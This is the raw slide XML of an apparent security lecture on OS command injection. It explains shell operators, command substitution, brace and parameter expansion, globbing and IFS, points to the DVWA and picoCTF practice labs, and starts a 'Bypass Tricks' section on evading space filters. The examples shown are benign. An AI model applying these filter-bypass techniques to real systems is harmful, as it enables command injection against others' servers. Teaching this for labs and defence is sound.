              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="040C28"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> returns </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="040C28"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> ($? == 1), the commands to the right of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="040C28"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> are executed;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example: cmd1 || cmd2 || cmd3</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6" name="Google Shape;196;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2925434" y="5635710"/>
            <a:ext cx="6085714" cy="6761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03" name="Google Shape;20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Backtick/Backquote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Command Substitution</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Most Unix shells and programming languages such as Perl, PHP, and Ruby use paired backquotes as command substitutions, meaning that the output of one command is used as input to another.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example: cmd1 `cmd2`</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04" name="Google Shape;204;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4167428" y="5448476"/>
            <a:ext cx="3857143" cy="1409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11" name="Google Shape;2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square brackets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A build-in function in bash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="040C28"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="040C28"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Used for condition control in shell script.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18" name="Google Shape;21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square brackets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040C28"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="040C28"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Range or Set in a regular expression</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="040C28"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="040C28"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="040C28"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Example: [regex]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="219" name="Google Shape;219;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6272463" y="3863247"/>
            <a:ext cx="5919537" cy="29947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OWASP Top 10</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7" name="Google Shape;97;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2419513"/>
            <a:ext cx="12160227" cy="33621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26" name="Google Shape;22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curly brackets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Bash brace expansion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33" name="Google Shape;23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Bash brace expansion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="040C28"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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Range List</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="040C28"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="040C28"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Syntax: {&lt;start&gt; . . &lt;end&gt;}</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E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="040C28"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>xample</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="040C28"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>echo {0..10}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>combine two or more sequences: echo {a..z}{a..z}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="4572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40" name="Google Shape;24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Bash brace expansion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="040C28"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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String List</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="040C28"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="040C28"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Syntax: {String1, String2,... ,StringN}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="040C28"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="040C28"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="040C28"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>xample</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="040C28"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>echo {PHP,Javascript,JQuery}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Combined with preamble</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="241" name="Google Shape;241;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096001" y="5010729"/>
            <a:ext cx="6096000" cy="18472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Linux Command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Google Shape;2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curly brackets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Shell parameter expansion</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i="1" lang="en-US"/>
              <a:t>${parameter:offset:length}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Substring Expansion. It expands to up to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> characters of the value of </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> starting at the character specified by </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>offset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https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html</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9" name="Google Shape;249;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5936823" y="2676645"/>
            <a:ext cx="5027585" cy="13397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 - globbing pathnames</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Google Shape;25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 matches any single character. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A '*' matches any string, including the empty string.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IFS: A list of characters that separate fields; used when the shell splits words as part of expansion. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IFS=$' \t\n’   // space tab enter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 - globbing pathnames</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Google Shape;26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Named character classes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>[:alnum:]  [:alpha:]  [:blank:]  [:cntrl:]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>[:digit:]  [:graph:]  [:lower:]  [:print:]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>[:punct:]  [:space:]  [:upper:]  [:xdigit:]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62" name="Google Shape;262;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2101287" y="4001294"/>
            <a:ext cx="7027059" cy="18354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backslash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Google Shape;268;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backslash only escapes the following characters:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>$</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>`</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>“</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CRLF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Can’t escape single quote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69" name="Google Shape;269;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6719620" y="3962762"/>
            <a:ext cx="3980952" cy="28952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OS Command Injection Exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Google Shape;275;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Have a try</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;28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DVWA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1D253B"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="1D253B"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Picoctf - caas</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="1D253B"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>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Bypass Tricks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Google Shape;28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Space bypass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Internal Field Separator: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;space&gt;&lt;tab&gt;&lt;newline&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
